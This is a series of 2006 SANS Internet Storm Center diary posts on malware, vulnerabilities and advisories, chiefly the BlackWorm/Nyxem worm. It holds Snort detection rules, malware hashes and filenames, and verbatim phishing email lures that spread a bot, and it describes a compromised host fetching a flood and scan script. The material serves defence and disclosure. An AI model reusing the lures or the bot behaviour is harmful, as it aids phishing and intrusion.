Published: 2006-01-31

Updated Malware Domain List

The folks at Bleeding Snort released an updated list of known malware-related domains yesterday, up to 9,400 entries now!  For those of you employing DNS black holes, proxy-based filtering, or doing other general research of malware based on domains, you should check out this exhaustive (and exhausting!) new list.  I frequently rely on this list to match against when doing research of spyware and related nasties.  Kudos to the Bleeding Snort guys for their hard work.


Published: 2006-01-31

CME-24: It Has Begun

According to the folks at F-Secure, the CME-24 file deletions have begun for folks whose clocks are set wrong (remember, this puppy is set to fire up on Feb 3).  For those not keeping score, CME-24 is the one that is also called Blackworm, Nyxem, Blackmal, Mywife, etc.  It's going to be rough several days for some folks out there.  For more info on CME-24, here is the latest Internet Storm Center post on it.  Here is a Microsoft round-up on the issue as well. 

Just remember: Malware was created by man. It evolved. It rebelled.


Published: 2006-01-31

Two-Way Firewall in Windows Vista and Microsoft OneCare

With client-side exploits so plentiful, it sure would be nice to have some form of serious outbound firewalling built into Windows, wouldn't it?  The XP firewall blocks inbound traffic, but is of little use in outbound defenses.  As Handler Queen Lorna Hutcheson points out, since Win2K, you can filter outbound using the so-called IPSec filters of Windows.  However, such filters are: 1) Really badly named -- they don't have to use IPSec crypto; 2) Really hard to define (what an ugly GUI); and 3) Not limiting to specific applications to use specific ports and protocols.  So, the existing outbound filtering of Windows is extremely limited.

But, here's a nice article about how Microsoft plans on including outbound filtering in the Windows Vista firewall. Let's see, we've had such features with free solutions for over a decade.  But only in 2006 will we get it standard in Windows. 

In Microsoft's defense, though, once an attacker infiltrates via a client-side exploit, their evil code can simply alter the firewall config.  True.  But, still, security is all about raising the bar.  We raise the bar, they jump over it.  We then raise it again.  It's the natural order of things.  I hear some arguments that say, "We shouldn't do this from a security perspective, because they'll jump over this bar."  But, if the cost of such solutions is miniscule, why not raise the bar anyway, knowing that it still can be jumped?  Let's make the bad guys work a little harder if it doesn't cost us anything.

A related story involves Microsoft's OneCare technology, an attempt at a comprehensive set of anti-virus/anti-spyware/firewall tools that help provide an envelope of protection around a user's PC.  A blog post here talks about ways to dodge the defenses of OneCare, primarily by using Java and/or signed code to bypass the firewall restrictions.  Some Microsoft personnel respond here, saying that their goals were to pull security configurations together in one place and offer protection while minimizing application breakage.  It's all about trade-offs.  And I, for one, welcome our new OneCare overlords.  There are many copies.  And they have a plan.


Published: 2006-01-31

Client-Side Exploits - The Mother Lode?

As any stroll down the latest Metasploit exploit list will tell you, attacking client technologies is very hot right now, including browsers, mail readers, audio players, etc.  Here is an interesting article from Brian Krebs about a huge area likely to be very ripe with such exploits: ActiveX controls installed by third parties.  Krebs summarizes well the research of Richard M. Smith, who claims to have found a cornucopia of buffer overflow flaws in widely deployed ActiveX controls.  Handler extraordinaire Agent Tom Liston points out the possibility of using a known flaw in an ActiveX control to really help target a given population, such as a given ISP's customers or perhaps a given corporation or government known to use a given ActiveX control.


Published: 2006-01-31

AMD Forums Uh-Oh

Speaking of client-side sploits, it appears that AMD's forums website was used to distribute WMF exploit code the other day.  F-Secure has a write-up on the situation.  It's been resolved, but there is likely a very interesting story behind this one.  Again, client side exploits are the wave of the present.


Published: 2006-01-30

Winamp 5.x Remote Code Execution via Playlists

While we're on the topic of audio software, there's a 0-day exploit out today for Winamp 5.12 that allows
remote code execution via a crafted playlist (.pls) file.  The proof-of-concept exploit suggests using an
iframe to trigger a 'drive-by' attack on anyone unlucky enough to visit a website containing a malicious
iframe; say, third-party advertisers and forum websites--the usual vectors for this sort of thing.
Secunia's got a nice writeup of it here. 

Our friends over at FrSIRT have posted a workaround in their advisory on the issue:
To prevent opening malicious files automatically, FrSIRT recommends :

Disabling the "audio/scpls" and "audio/mpegurl" MIME Types in Internet Explorer by deleting or renaming the following registry keys :

And disassociating the "pls" and "m3u" file extensions in Windows :

- Launch Windows Explorer
- On the Tools Menu select "Folder Options"
- Select the "File Types" tab
- Scroll to find the PLS and M3U file extensions and then press the "Delete" button


Published: 2006-01-29

SHOUTCAST <= 1.9.4 Vulnerability, Exploit Available

On December 26, 2005, Secunia released an advisory regarding a vulnerabilty in Shoutcast.  We've received a report about a few sites detecting odd log entries that fit the vulnerability description, with corresponding server crashes over the past few days.  An exploit has been published on, at least, one site.  The solution is to update to the latest version (v.1.9.5).  The advisory is available at Secunia.

The default port for SHOUTcast is 8000--Dshield shows a spike in targets on the 14th and more recently.


Dave Brookshire (http://parapet.net)


Published: 2006-01-28

ActiveX Kill Bit Can Be Bypassed - Another Reason to Apply MS05-054?

ISC reader Juha-Matti Laurio pointed out a new vulnerability note VU#998297, published by US-CERT on January 26, 2006, which states that a malicious website can bypass an ActiveX kill bit by taking advantage of a bug in Internet Explorer.

A kill bit is a registry setting that prevents Internet Explorer from running the corresponding ActiveX control even if the control is installed on the system. It is not uncommon to proactively set kill bits for known malicious ActiveX controls as part of a spyware-prevention effort. For example, the SpywareGuide website provides a freely downloadable .REG file for setting kill bits of many "dubious" ActiveX controls.

The VU#998297 vulnerability demonstrates the limitation of relying on kill bits as the sole mechanism for protection against malicious ActiveX controls.

The US-CERT article implies that this vulnerability was fixed by the MS05-054 patch, which was released in December 2005. Strangely, Microsoft's MS05-054 advisory did not mention any bugs related to kill bits. Perhaps the kill bit flaw is a specific problem related to the COM Object Instantiation Memory Corruption Vulnerability (CAN-2005-2831), which was covered in MS05-054. Strangely, US-CERT lists a different CVE number (CVE-2006-0057) when discussing the kill bit problem.

So, as far as I can tell, you can address the kill bit vulnerability by installing Microsoft's MS05-054 patch, though I am not quite sure of that.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-01-28

Detecting BlackWorm Without Signatures

An article in a German magazine PC-WELT describes a study of anti-virus vendors' ability to detect BlackWorm when it first hit the Net. The analysis, performed by AV-Test lab, points out that some vendors were able to detect the worm without the need for BlackWorm-specific signatures, while others needed to release new signatures.

Signature-based detection mechanisms have been essential to anti-virus products' ability to recognize malicious code. Over the past several years, anti-virus vendors have made strides in heuristic and behavioral detection algorithms, and I am glad to see that these measures in several products were effective at stopping this worm.

I'd like to extend kudos to eSafe, Fortinet, McAfee, NOD32, and Panda, whose anti-virus products, according to the AV-Test study, were able to recognize that BlackWorm was malware heuristically, without requiring a specialized signature. Also, congrats to ISS, Kaspersky, and Panda for being able to recognize it through behavioral means without a signature.

Take a look at the article for additional details. Even if you don't understand German, you may find the tables, which document the study's findings, interesting. The first table lists behavioral methods, the second heuristic ones, and the third one signature-based tools.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-01-28

KbHook.dll is Not Always Spyware

I am a fan of Microsoft AntiSpyware tool for several reasons:

  1. It's relatively easy to use
  2. It's feature set is very comprehensive
  3. It's free
(There are other excellent anti-spyware tools out there, too. This story just happens to start with a Microsoft AntiSpyware scan.)

Like all malware scanners that use signatures to identify malicious code, Microsoft AntiSpyware can raise false alarms. I was recently reminded of this after a scheduled scan of a Windows workstation produced the following crticical alert:

This screen shot was modified to remove the date when the alert occured.

Whoa! Key loggers are a particularly nasty type of malware, because they are created to monitor and record keyboard activities. They are often designed to capture the victim's interactions with a login form of some kind, frequently targeting logon credentials for banking websites. NetSpy, identified by this spyware scan, is known to be able to log the victim's key strokes, take screen shots, and transmit captured data to the attacker. No wonder a spyware scanner typically categorizes it as a severe threat.

Although many malware-scanning tools identify the kbhook.dll file itself as spyware, its presence alone is not sufficient. The infected system also needs to have additional software components that make use of the DLL's key stroke-monitoring features. In case of the workstation that I was analyzing, I could not find any additional suspicious components. Although that, alone, would not be sufficient to calm me, additional evidence reinforced the theory that I was dealing with a false positive.

The creation date of the offending file c:\windows\system32\kbhook.dll matched the day when the workstation's user happened to install drivers for his BenQ keyboard. Repeating the driver installation process confirmed that the kbhook.dll file is supplied by the keyboard vendor, presumably to enable non-standard keyboard features such as hot keys.

A web search revealed several discussions of false positives associated with files named kbhook.dll. One such discussion stated that Genius Wireless Keyboard drivers used this file without malicious intent. Another discussion of an unknown-to-me keyboard reached a similar conclusion.

The kbhook.dll file on the workstation I examined was a Microsoft Visual C++ 6.0 DLL, with MD5 hash 68ef310fdb7788a8ea8841c8fe80e66e. It exported two functions: EnableHook() and DisableHook(); this is how an external program can make use of the DLL's keyboard-controlling functionality.

Personally, I am not crazy about having a DLL with this functionality installed on a system, because one never knows which program will attempt to take advantage of its EnableHook() and DisableHook() functions. I was able to delete the file from the workstation, because the user did not make use of the BenQ hot keys that the driver was meant to enable. Other reports on web forums suggest that removing the file for certain keyboards may prevent the device from working properly.

If you encounter a kbhook.dll file on your system, please remain vigilant. This file is often associated with dangerous key loggers, presence of which may require a full system reinstall. However, keep in mind that malware scanning tools sometimes mis-identify this file. Specifically, the file named kbhook.dll is sometimes used by keyboard driver authors without malicious intent.

Lenny Zeltser
ISC Handler on Duty


Published: 2006-01-27

Another day, another bot being spammed

New bot (a Brepibot variant) is being actively spammed. What's interesting about it is that it seems to be targeting universities.  Also, it seems that the author is constantly producing new variants of the bot. In last couple of hours we received several samples of the bot:

e5f68caf1c546e00fff964d8ac18d37a  Photo and Article.exe
69564b5904d8a4e33d58e25ef6edfd39  Transaction and Billing Services.exe.1
a2d9fc4ece5caa109291b25804ef6f3a  photo+article.exe

This bot is working the heavily the social engineering side and playing on the emotions of its targets.  One targets a person's ego and the other is targeting people for their sympathy/empathy.  Here are some of the subjects that we have seen.

Photo and Article
Campus Student Raped
Do you recognise this person?
CCTV still of Rapist
Rape on Campus

Here are a couple of the message bodies:


We are planning to include you in the new campus magazine in an article titled "Campus Life".  Can you approve the photo and article for
+us before we go to printing please?

If any details are wrong then we can amend before printing on Wednesday the 1st of February so please get back to us as soon as possible.
+We have attached the photo and article.

Many Thanks & Best Regards,

Joseph Hope


During the early morning of January 25 2006, a campus student was the victim of a horrific sexual assault within college grounds.
+Eyewitnesses report a tall black man in grey pants running away from the scene.  Campus CCTV has caught this man on camera and are
+looking for ways to identify him.  If anyone recognises the attached picture could they inform administraion immediatly


Robert Atkins
Campus Administration"

One attachment was an .exe and the other was a zipped attachment containing an .exe

Please let us know if you see any other variants!!


Published: 2006-01-25

Blackworm Notifications

Blackworm infected machines reported to a 'counter' site the fact that they got infected. The TISF BlackWorm task force obtained the logs from this counter, and is notifying networks represented in the logs. These notifications will use a from address of "handlers@sans.org" or "Randy_Vaughn@Baylor.edu". Please e-mail jullrich\at/sans.org if you would like to obtain a list for your network, and have not received an automated e-mail.

Please include information to support that your e-mail address is associated with administering the respective networks, or a phone number to validate the information.

Update: We are getting A LOT of requests. Please do not forget to include the IP space you are interested in. Quite a number of people responded that these logs helped them identify infected systems and it likely prevented major data loss to these organizations. BIG THANKS to RCN for providing the counter logs in a timely manner. We could not provide this service without their help.


Published: 2006-01-25

Cisco IOS local privilege escalation

Cisco released earlier a vulnerability note detailing a problem within some Cisco IOS versions that bypasses the command authorization offered by AAA services such as TACACS+. The bypass uses tclsh.

Why a router would need tclsh is a mystery to this handler.

Swa Frantzen


Published: 2006-01-25

DoS exploit publicly released for Cisco Aironet AP

An exploit was publicly released by FrSIRT for crafting the arp requests needed to exploit the vulnerability described at Cisco. As a reminder this vulnerability is related to resource exhaustion and consequently a Denial of Service condition due to arp requests.
If you have not taken measures to protect your Cisco Aironet Access Points, now would be a good time to start planning the upgrades or implement one of the workarounds in the Cisco advisory.

Swa Frantzen


Published: 2006-01-25

FreeBSD packet filter (pf) DoS using fragments.

FreeBSD announced a patch for a vulnerability that can trigger a kernel panic due to crafted fragments and their handling in pf(4).

Workrounds are available: do not use "scrub fragment crop" or "scrub fragment drop-ovl" in the pf.conf(5)

More information:
Swa Frantzen


Published: 2006-01-24

Seasonal Malwares and other trends

Seasonal Malwares and other trends...    

Seasonal Malwares are not a new thing, remember Bin Landen´s emails "see the pictures of Bin Landen
being arrested"...:) but recently I started to see some really intresting ones...

- In the end of 2005, the most common malwares were named <something>2006.exe/scr...like greeting
cards wishing a very happy 2006...:)

Some examples:
felizanonovo2006.UOL.scr-9ac416ab6f2da444c4dcba8750ff31d4      BehavesLike:Trojan.Downloader
terra2006.scr-81cab96a398d4399c8dd444d107a03e2          Win32.Worm.VB.AR
cartao2006.scr-112785080ab88f639ed77ef7c963355e         Trojan.Downloader.Delf.QZ
Cartoes2006.exe-0fd8e5dc41e6b6a74046fb2a34045d90         Trojan.Banker.Delf.8B54173E
fefe2006.exe-e6791a1c8525c778ccb2eabb53423ed4             Win32.Parite.B
feliz2006.exe-a25f1cca2ae0d210eb28600403c1a894             Trojan.Downloader.Banload.V
feliz2006.scr-96ba8bfefe94baf8eaa533921715cf06             Trojan.Banker.VB.4616C390

Sometimes, if you check the md5 hash, you will notice that some that appears to be a new one, was in fact an old one, that was renamed to something more current...

Another example: A new version of reality show Big Brother was about to start in Brazil on January 2006, it was called BigBrotherBrazil 6. So, we started to see some emails telling that if you fill the 'form'  you would get a chance to be part of the show:

BBB6.exe  suspected: GenPack:Generic.Malware.Sdld.91FA0809

One more? Ok, today is January 23, and here in Brazil, we are about 1 month before our Carnival, which is a big
party here...So, guess what:

carnaval-previnido.scr-3f1476def1dadd57f54658aae6710acc suspected: BehavesLike:Trojan.Downloader

Another interesting trend that I am observing is the use of .cmd extensions.

www.convitedoorkutpravoce.cmd-2924df691a9fe38ec1bdfd1bfabf1ad5         Trojan.Downloader.Banload.AL
www.fernandapaesleme.com.br.cmd-a3aedc0d95549e086e5c4a89956923f7     Trojan.Downloader.Delf.CI

But what is a .cmd extension? Thats a question that I asked on my Malware Analysis Quiz 3 :
"On windows OSs, files with the "cmd" extension are generally scripts passed to the cmd.exe command interpreter for execution. They are very similar to the (older) ".bat" files,used since the days of DOS for scripting and interpreted by command.com, but the different extension indicates slightly updated syntax/capabilities associated with cmd.exe"

And to finish our update on malware world, hacking websites or using free hosting sites to host malware is   happening yet, but I am seeing more and more malwares hosted on file-sharing websites , like i.e., rapidupload.com, zupload.com...which is kind more difficult to take down...

For example: http://z13.zupload.com/file.php?filepath=<removed>

If you want to take a look at my personal zoo, you can check it here. On this zoo I try to keep malwares with unique md5 hashes.

Btw, did you update your AV for  Nyxem.E??  Check it twice...you dont want to lose your .doc,.xls,.ppts...right?

Handler on Duty: Pedro Bueno ( pbueno && isc. sans. org )


Published: 2006-01-24

OpenSSH scp Issue

Secunia has released an advisory here that addresses an issue with the use of the "system()" function in scp.  Because of this usage, certain special characters, that may be in the command line arguments to scp that are escaped on the command line, go through shell expansion twice and lose their special escape character.  This can cause what was initially a valid filename to now be interpreted as multiple filenames (pointing to non-existing files) or as additional commands (if the filename had included a semi-colon).

Additional details about the bug can be found from this Bugzilla post.

The latest version of OpenSSH, 4.2p1, is affected by this issue and a patch has not yet been made generally available.  Fedora has released updated RPMs for Fedora Core 4 that address this issue.  You can get more information about the Fedora updates here.

Here is an example from the Bugzilla post demonstrating the bug

Steps to Reproduce:
1. touch foo\ bar (the \ escapes the space embedded in the filename)
2. mkdir somedir
3. scp foo\ bar somedir

Expected Results:
No message, the file copied
Actual Results:
cp: cannot stat `foo': No such file or directory
cp: cannot stat `bar': No such file or directory


Published: 2006-01-24

BlackWorm Summary

About BlackWorm

Over the last week, "Blackworm" infected more then 700,000 systems as measured using a counter web site used by the worm to track itself. This  worm is  different and more serious then other worms for a number of reasons. In particular, it will overwrite a user's files on February 3rd.

At this point, the worm will be detected by up to date anti virus signatures. In order to protect yourself from data loss on February 3rd, you should use current (Jan 23rd or later) anti virus signatures.  Note, however, that the malware attempts to disable/remove any anti-virus software on the system (and does this every hour while the system is up), so if the machine was infected before signatures were deployed, obviously, that anti-virus software can't be expected to clean up the infection for you.

The following file types will be overwritten by the virus: DOC, XLS, MDE, MDB, PPT, PPS, RAR, PDF, PSD, DMP, ZIP. The files are overwritten with an error message( 'DATA Error [47 0F 94 93 F4 K5]').

We will try to post more detailed cleanup instructions later. However, it is likely that you will have to rebuild the system from scratch. Obtaining good backups is critical as a first step.

The first thing you should do is to update your anti virus signatures.

This page will be updated as new information becomes available. Please see the end of the page for references to other sites. Use only this url to link to this page: http://isc.sans.org/blackworm


As usual, this worm/virus has collected a number of names from various vendors. It is so far known as: Blackmal, Nyxem, MyWife, Tearec among other names. Update: we have been informed that the CME number will be 'CME-24'. cme.mitre.org should shortly list this number.

How would I get infected?

The worm spreads via e-mail attachments or file shares. Once a system in your network is infected, it will try to infect all shared file systems it has access to. You may see a new "zip file" icon on your desktop.

What will BlackWorm do to my system?

It will disable most anti virus products and delete them. The worm will e-mail itself using a variety of extensions and file names. It will add itself to the list of auto-start programs in your registry.


Anti virus vendors offer removal tools. Microsoft provides detailed instructions for manual removal. However, there are two important reasons to rebuild "from scratch":
  1. BlackWorm uses the same tricks to install itself as other viruses/worms. It may not be the only one on your system. Antivirus will not detect all viruses, and the removal tool will only remove this specific worm.
  2. BlackWorm will allow remote access to your system, and additional malware may have been installed via this backdoor.

Snort Signatures

Joe Stewart (Lurhq.com) provided the following snort signatures based on his analysis of the worm:
(for up to date rules, see bleedingsnort.org.
  1. This sig alerts if someone visits any counter at webstats.web.rcn.net without a Referrer: header in their URL. Could be an infected user, could be one of us checking out the counter stats:
  2. alert tcp any any -> any 80 
    (msg:"webstats.web.rcn.net count.cgi request
    without referrer (possible BlackWorm infection)";
    content:"GET /cgi-bin/Count.cgi|3f|"; depth:23; content:"df|3d|";
    content:"Host|3a 20|webstats.web.rcn.net"; content:!"Referer|3a|";
    classtype:misc-activity; sid:1000376; rev:1;)

  3. This sig alerts on the specific pattern BlackWorm uses to test connectivity to www.microsoft.com. It's unique in that the request doesn't have a User-agent: header. So this will catch BlackWorm and possibly other automated requests to microsoft (which could happen if someone codes a sloppy app that uses the exact same pattern - but they should probably be flogged anyway)
  4. alert tcp any any -> any 80 
    (msg:"Agentless HTTP request to
    www.microsoft.com (possible BlackWorm
    infection)"; dsize:92;
    content:"GET / HTTP/1.1|0d0a|Host|3a20|www.microsoft.com|0d0a|
    classtype:misc-activity; sid:1000377; rev:1;)


We would like to thank the members of the TISF BlackWorm task force for analysis and coordination.

The task force emerged from the MWP/DA groups.  This task force is now known as the TISF BlackWorm task force. It involves many in the security (anti spam, CERTs, anti virus, academia, ISP's, etc.) community and industry, working together to combat threats to the security of the Internet in cooperation with law enforcement globally.


Update: http://www.lurhq.com/blackworm.html
Trend Micro

Note: some of these links will offer removal tools. We have not tested any of these tools thoroughly enough to recommend them. They should be used as a "first try" tool, but do not substitute for a full analysis and possible rebuild of the infected system. BlackWorm includes the ability to install additional components. These additional components, if installed, will likely be missed. In addition, a virus like BlackWorm is likely an indication of a more fundamental problem in your security posture and multiple infections are likely.


Published: 2006-01-23

More on Nyxem

Although Nyxem is comparatively less spread then worms like Sober or Netsky, it's still doing a fair number of rounds.

The graph below is from one of the e-mail gateways with a decent number of e-mails processed daily (around 500.000+). You can see that Nyxem.E is the top malware instance detected in last 24 hours, with more than double the occurences then the next highest occuring worm (Netsky).

This is not strange as the Web counter that the worm visits upon infecting the machine currently shows around 630,000 infections (we can't be sure that this number is correct). Bert Rapp e-mailed us asking about the URL that the worm visits. This can help you in determining if a machine is infected, as it will visit the URL with the counter.

The counter is at:

h tt p:// webstats.web.rcn.net/ [REMOVED] / Count.cgi?df=765247

You can search your web logs for this host name (which looks as a legitimate site).

Other than that, Fortinet released their in-depth analysis of the Nyxem worm with some pretty interesting details (you can find the original analysis here).
The most interesting part, which I haven't seen in other analysis of the worm says:

"Additional Registry Changes

  • The virus is coded to register the dropped ActiveX control through changes to the system registry. By creating the following registry entries, the control is considered "safe" and digitally signed."
The threat of worms like this will make them much more dangerous in the future. If a worm puts a fake CA certificate on an infected machine, MITM attacks become extremely easy. Of course, we all know that once the machine is infected you can't trust it, but this looks like another (big) problem for the average user out there.


Published: 2006-01-23

Illusions of Security: wrap-up for Mac OS X

A few days ago I wrote an article titled "illusions of security". We got quite a bit of response on it.

Some of the response came from vendors, but the point of the article was to try to create awareness at the staff of those (third party) vendors, the salespersons working in shops, administrators and users of computers that there is no such thing as an invulnerable computer.

Some responses were pointers to tools on how to secure Mac OS X and that part does have merits to do a follow-up. Perhaps the security community needs to learn a bit more of Mac OS X. I count myself as one of those who still needs to learn more about OS X. One way to learn more is to know what is available.

So some recommendations from our readers:
NOTE: this is not a recommendation from myself, the handler or SANS. It's just a list gathered from feedback of our readers, use at your own risk.

I'm actually sure there's more out there but we'll leave it as an excercise for our readers to find it for themselves.

Swa Frantzen


Published: 2006-01-22

What's the threat? And who is noticing it? Nyxem_e versus CME 508

CME 508 does not threaten like Nyxem_e, on February 3rd and every third day of the month thereafter Nyxem.E will destroy users work (see F-Secure's blog) when the worm activates and replaces "the content of user's files with a text string "DATA Error [47 0F 94 93 F4 K5]". Among these files are: DOC, XLS, MDB, MDE, PPT, PPS, ZIP, RAR, PDF, PSD and DMP" "on all available drives", and yes, available = shared drives.

fwiw, I look at published email malware statistics daily, both Nyxem_e and CME 508 are approximately the same in volume reports, and nowhere near sober was last year as far as raw numbers go. But Nyxem.E has legs, it's more like a centipede than a worm, and it's not likely to drop off the radar soon, certainly not before the 3rd of February.

The Handlers diary previously referenced Nyxem.E in More on Blackmal/Grew/Nyxem (file deletion payload.
Source info - see the F-Secure Virus Information Pages : Nyxem.E

The vendors below do not mention the destruction of user work, as of the checking I just did, ymmv.
Also Known As: 

WORM_GREW.{A, B} [Trend Micro],
"It gathers email addresses from files with the following extension names:


W32.Blackmal.E@mm Symantec

W32/Nyxem-D [Sophos],

W32/MyWife.d@MM  [McAfee],

W32/Grew.A!wm (Fortinet),

W32/Small.KI@mm [Norman],

Win32/Blackmal.F [Computer Associates]

Tearec.A Panda

The CME reference is difficult but not impossible to follow. I'm reading CME links which show "Latest CME Identifiers CME-508", however, that last 508 link has english that says the newest CME-ID is "CME-503  - Date Assigned 2006-01-20". In any event I base my comment that "CME-508" is not a threat because I interpret vendor malware write-ups mentioning CME 503 as the "new" threat called CME-508 at cme.mitre.org. The vendors are listing 503, none are using 508 ......


Published: 2006-01-21

KDE kjs encodeuri/decodeuri heap overflow vulnerability

There is a vulnerability in KDE kjs JavaScript interpreter engine which can be exploited to cause a DoS or arbitrary code to be executed on a vulnerable system.

The JavaScript interpreter engine used by Konqueror and other parts of KDE contain a heap overflow which can be triggered when decoding specially crafted UTF-8 encoded URI sequences. Vulnerable system can be compromised by malicious javascript code (e.g. on a malicious website) using affected JavaScript interpreter engine.

Details can be found at:


Published: 2006-01-21


We received a submission from our reader James reporting on a compromised system. It is likely exploited through the vulnerable mambo installed.

The system being compromised will attempt to download tool and a perl script from:


The multi.txt and ok.txt are the same perl script that will perform various tasks such as TCP/UDP/HTTP flood, port scan and will also use Google to search for vulnerable targets. This is very similar to what is seen on:


It will also attempt to connect to an IRC server (shell.durresi.be) over port 34345. The interesting part of the domain durresi.be is:

* The domain is just registered on 20 Jan 06.
* Some of the registration information is suspicious and fake. It is a .be domain but registered using a .it email address, a UK snail mail address and a fake US telephone number.

How interesting. If you are running mambo application, make sure it is running the latest version.

Thanks to Patrick Nolan, Marc Sachs and Swa Frantzen for the information.


Published: 2006-01-20

Periodic reminder of best practices for cleaning up after infection.

Well, it was a rather quiet day at the ol' Storm Center today.  We did, however, get an e-mail similar to ones we get rather frequently, that is probably worth talking about again.  This e-mail was from an admin who had 50 machines infected with a particularly nasty worm and they were told by their A/V vendor that they didn't have a way to clean out the infection.  We've written on the subject on multiple occasions in the past, so I won't go over all of the rationale again (see the links below).  The short answer, though, is that once you've been infected by malware that installs a backdoor or connects to a botnet, simply cleaning up the initial infection (and the hole through which the infection occured) isn't sufficient because you can't be sure what secondary infections you may also have.  Although most people don't want to hear it, at this point your best bet is to nuke the machine and reinstall (and patch) from scratch.

Here are some of the stories we did on the subject in the past.

http://isc.sans.org/diary.php?date=2004-05-16 by Pat Nolan and
http://isc.sans.org/diary.php?date=2004-05-03 by yours truly.

Jim Clausing, jclausing ++at++ isc.sans.org


Published: 2006-01-20

More on Blackmal/Grew/Nyxem (file deletion payload)

Following up on Bojan's story from Wednesday, F-Secure posted a bulletin today with their analysis of the current variant.  The interesting (or is it scary?) part of this analysis is the revelation that on the 3rd of the month it will attempt to delete a lot of documents off the user's disks, including Office documents (*.doc, *.xls, *.ppt, *.pps), PDF files, .zip and .rar archives among others.  They also report that based on a counter on a web page that the worm updates, there are in excess of 400,000 machines infected at this time.

Jim Clausing, jclausing /at/ isc.sans.org


Published: 2006-01-19

F-Secure Security Bulletin

F-Secure has issued a critical security bulletin regarding a Code Execution vulnerability that affects all of F-Secure products. The bulletin states that if you have the 2004 to 2006 versions with the Automatic Delivery System that you will be patched automatically.

For older versions or systems that are not automatically updated - the patches are available at:


Good work Thierry for discovery of this vulnerability. 


Published: 2006-01-19

Symbian operating system - Nokia series 60 mobile phones - 3 new Trojans

For those of you with the Nokia Series 60 phones I have some bad news.  Symantec today has posted 3 new trojans identified that impact your operating system. 

SymbOS.Sendtool.A -  The Trojan horse drops a hacktool that can be used to send malicious programs, such as variants of the SymbOS.PBStealer family of Trojans, to other mobile devices via Bluetooth.

SymbOS.Pbstealer.D - The Trojan sends the user's contact information database, Notepad, and Calendar To Do list to other Bluetooth-enabled devices.

SymbOS.Bootton.E - A Trojan horse that restarts the mobile device when executed. However, as it also drops corrupted components, the device is unable to restart.

While looking at this information - I discovered that this particular phone OS has been hit several times in the last 2 years by trojan like programs.  I can't find anything on the Nokia site that indicates that a patch is available.  I wonder if it isn't time for Nokia to take a serious look at fixing the problem?  Especially since one of these new ones allows someone with another Bluetooth device to steal the user's information. 

What about it Nokia?  For those of you that own these devices, what are you doing to protect your phone?


Published: 2006-01-18

Port 13701 spikes

Immediately after the FrSIRT public release of the exploit against Veritas NetBackup scanning for TCP/13701 started to increase dramatically.

Date Sources Targets Records
2006-01-18 156 47350 96176
2006-01-17 319 64840 202750
2006-01-16 173 19805 56116
2006-01-15 8 18 39
2006-01-14 4 3 10
2006-01-13 7 7 24
For a more detailed view:


We also provide per autonomous system reports for those managing an AS:

Swa Frantzen


Published: 2006-01-18

Cisco sgbp DoS

Cisco published a report about a DoS condition on some of their routers.

It is situated in the Stack Group Bidding Protocol (sgbp) wich is used to enable bandwidth on demand using Multilink PPP (MLP).

Full details at cisco

To summarize:

  • Not vulnerable if the router does not support sgbp or if it is not configured (so #show sgbp should give no output or a syntax error message).
  • Workarounds are listed with ACLs to protect UDP/9900 on the affected routers.
  • Upgrade to fix it
  • Traffic to UDP/9900 might now be DoS attempts.
Swa Frantzen


Published: 2006-01-18

Worldnic outage

We got reports that worldnic DNS servers were not responding and in our preliminary search we found that all the ns?.worldnic.com DNS servers were indeed not responding to requests.

For a while we had trouble reaching the network solutions website (redirection loop), next their website spoke of "a widespread outage" without more detailed information. Now it says "At 10:45 a.m. this morning, we experienced a hardware problem that impeded traffic to our hosting and e-mail servers.  We experienced technical difficulties with an auto recovery system.  At 11:50 a.m. the system was restored. " which would seem to indicate the problems are over.
To the more technical reader it might be clear that the problem that was reported had nothing to do with their email nor their web hosting servers, but with their DNS servers. Or perhaps these servers had issues as well, but that hardly matters to the average user when DNS isn't working as it should.

Also remember this diary about a very similar incident.

Swa Frantzen


Published: 2006-01-18

Illusions of security

First off, I'm not bashing vendors, pet operating systems or even people. Just trying to make people realize they might have illusions. So stop reading here if you cannot deal with disillusions.


I recently purchased a computer for my wife at a small shop. I really like the shop. They customize off-the-shelf hardware to make extremely silent high performance PCs. So after the waiting for this new monster's parts to be collected and customized, I went to the shop to pick it up.  The shopkeeper takes the time to open up the case to show their work, turns it on, and I verify the hardware properties to make sure my custom build machine has all the right parts. All good, I still like them.

Before he turns it off though he tells me something very worrisome. It went like: "We turned off the windows automatic updates". I wasn't sure if I'd wipe the harddisk or not at that point, but as such things would convince me to wipe, I answered "No problem, I'll enable it when I get home, thanks for the warning". Then he goes on to explain they do that always as "In our experience windows update and all those patches break more than the viruses harm you. Just add a good anti-virus program, we've already tightened up the windows firewall. You'll be safe, don't worry. In our experience it is best to install the service packs Microsoft brings out, but stay away from the crap in between". Painfully wrong advise in my opinion, from a shop I like a lot for their hardware.

I'm very worried about the less security savvy consumer. I'm not convinced other shops give that much better advise. Sure they might want to try to sell me an anti-virus and personal firewall bundle. So we need to get the word out to the world at large. Do not believe all to easily you are safe, no matter the fancy explanations.

  • A personal firewall will help, but it will not protect you from everything out there.
  • An anti-virus program will help, but it will be unable to protect you from everything out there, especially new things go undetected very easily.
  • Updates from Microsoft are critical to be installed as soon as possible after they have been released. Microsoft does not release patches unless there are exploits against it.
And yes, experience shows installing patches is one of those moments you are more likely to get a blue screens of death. But you'd get them anyway, even if you did not install the patch. It's just a sign your machine was already becoming unstable. And it is a good opportunity to rebuild the machine and install the patches. See: no problem installing the patch on a clean system!
I've seen large IT support departments revert their policy from a shy away from patches to a patch ASAP policy for their desktops/laptops. Their conclusion was simple: we have less work in total and it is more spread out if we encourage immediate patching.

Mac OS X

Myself I use a powerbook. I like it a lot but I see a few things that worry me a lot:
  • Often we get answers -even here at the Internet Storm Center with our much more security minded population of readers- that go like "I'm using a mac, no security worries". Why can you be sure there are worries ? Check the number of security patches you got, they fix vulnerabilities. Well you have security worries, just no (mass) exploits.
  • Apple is switching to Intel CPUs away from the PowerPCs. Most script kiddies out there know Intel CPUs much better than they know a G4 or G5, so exploiting it becomes much easier for them. And yes, that Intel Duo is a dual core centrino, and a centrino is what it's just their cup of tea, plenty of machine code coders for it.
  • Apple uses open source software as a basis. One of the reasons I like OS X is exactly that it's based on BSD unix. But that open source community fixes vulnerabilities documenting the vulnerability in source code and at a very fast rate. Apple takes a bit longer to issue fixes for the same vulnerabilities. And that leaves a relative long window of vulnerability to exploit.
